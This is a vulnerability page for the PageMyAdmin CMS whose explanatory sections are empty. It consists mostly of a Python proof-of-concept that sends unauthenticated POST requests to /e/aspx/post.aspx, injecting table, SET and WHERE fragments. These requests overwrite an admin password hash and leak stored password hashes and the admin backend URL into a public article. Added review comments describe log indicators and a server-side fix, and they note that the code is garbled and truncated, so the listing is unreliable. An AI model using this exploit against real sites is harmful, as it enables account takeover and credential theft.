PageMyAdmin_sql注入漏洞

# PageMyAdmin sql注入漏洞

=======================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

### poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib2
import urllib
import re
import sys

# Entry point of the PoC: argv[1] is the site base URL, argv[2] selects one of
# three actions. The request target is always <base>/e/aspx/post.aspx.
# NOTE(review): this listing was mangled by the page renderer — straight quotes
# became typographic quotes (” ’) and the body indentation was dropped, so it
# does not parse as shown.
# NOTE(review): the usage text below lists the action as "uppass" while the
# dispatch matches "upass"; one of the two is a typo.
def main():
# sys.argv is indexed without a length check: fewer than two arguments raises
# IndexError instead of printing the usage text.
url=sys.argv[1]+”/e/aspx/post.aspx”
fun=sys.argv[2]
if fun==’upass’:
update(url)
elif fun==’sqlinject’:
sqlinject(url)
elif fun==’Backstage’:
Backstage(url)
else:
print”’
usage: pageadminsql.py http://www.baidu.com/ upass
parameter: uppass sqlinject Backstage
”’
# update(), sqlinject() and Backstage() all send the same request shape: an
# HTTP POST to <base>/e/aspx/post.aspx carrying only a User-Agent and a Referer
# header (no cookie or other session credential is attached), with the form
# fields siteid, formtable and thedata. The thedata value is a bracket-delimited
# string naming a table, what appears to be a SET assignment, and a WHERE clause
# ("[u][k]<table>[k][s][k]<column>=<value>[k]where[k]<condition>"), i.e. the
# client rather than the server decides which rows of which table get updated.
# For defenders, that request shape — POST /e/aspx/post.aspx, Referer ending in
# "?a=pageadmin_cms", "[u][k]" / "[k]where[k]" tokens in thedata — is what to
# look for in web-server logs, and the server-side fix is to stop accepting
# table/column/where fragments from the request body.
# Success is judged only on an HTTP 200 status, so the "成功" message does not
# prove the row was actually changed; every exception is swallowed and reported
# with a generic failure message (the bound exception `e` is never used, and
# the `pass` statements after each print are dead).
# update(): writes a fixed 40-hex-character value into pa_member.userpassword
# for id=2 — presumably a hex digest of the password named in the success
# message; the hashing scheme is not shown here.
def update(url):
headers = {“User-Agent”:”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0″,”Referer”:url+”?a=pageadmin_cms”}
formate={
“siteid”:”1″,
“formtable”:”1″,
“thedata”:'[u][k]pa_member[k][s][k]userpassword=”1527f10a11de5efea4b8516213413c103df55126″[k]where[k]id=2′
}
postdata = urllib.urlencode(formate)
request = urllib2.Request(url, data=postdata, headers = headers)
try:
response = urllib2.urlopen(request)
if response.getcode()==200:
# NOTE(review): the rest of update(), the whole of sqlinject() and Backstage(),
# and the __main__ guard were collapsed onto the single line below by the page
# extractor; the trailing `main(` is missing its closing parenthesis.
# sqlinject() and Backstage() use the same mechanism to copy
# pa_member.userpassword, respectively pa_log.url, into article.title for
# article.id=747 (a cross-table update) and then print the article URL where
# the script expects the copied value to be rendered.
print u”>>>>>>修改密码成功 修改密码:admin_1234213<<<<<<" pass except Exception as e: print u">>>>>>修改密码失败<<<<<<" pass def sqlinject(url): headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"} formate={ "siteid":"1", "formtable":"1", "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747" } postdata = urllib.urlencode(formate) request = urllib2.Request(url, data=postdata, headers = headers) try: response = urllib2.urlopen(request) if response.getcode()==200: print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1]) pass except Exception as e: print u">>>>>>密码注入失败<<<<<<" pass def Backstage(url): headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"} formate={ "siteid":"1", "formtable":"1", "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747" } postdata = urllib.urlencode(formate) request = urllib2.Request(url, data=postdata, headers = headers) try: response = urllib2.urlopen(request) if response.getcode()==200: print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1]) pass except Exception as e: print u">>>>>>后台地址注入失败<<<<<<" pass if __name__ == '__main__': main(
